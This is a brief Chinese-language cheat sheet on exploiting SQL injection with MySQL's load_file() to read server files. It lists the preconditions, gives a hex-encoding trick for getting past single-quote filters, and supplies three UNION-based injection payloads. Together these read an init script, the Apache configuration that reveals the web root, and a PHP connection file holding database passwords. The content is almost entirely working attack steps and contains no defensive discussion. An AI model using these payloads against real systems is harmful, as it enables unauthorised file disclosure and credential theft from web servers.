load_file()的使用

条件:

1. 要有file_priv权限
2. 知道文件绝对路径
3. 能使用union
4. 对web目录有读权限  
注：若过滤了单引号，则可以将函数中的字符进行hex编码

一般步骤

1. 读/etc/init.d下的东西，这里有配置文件路径

?id=1' union select 1,2,load_file('/etc/init.d/httpd')

2. 得到web安装路径

?id=1' union select 1,2,load_file('/etc/apache/conf/httpd.conf')

3. 读取密码文件

?id=1' union select 1,2,load_file('var/www/html/xxx.com/php/conn.inc.php')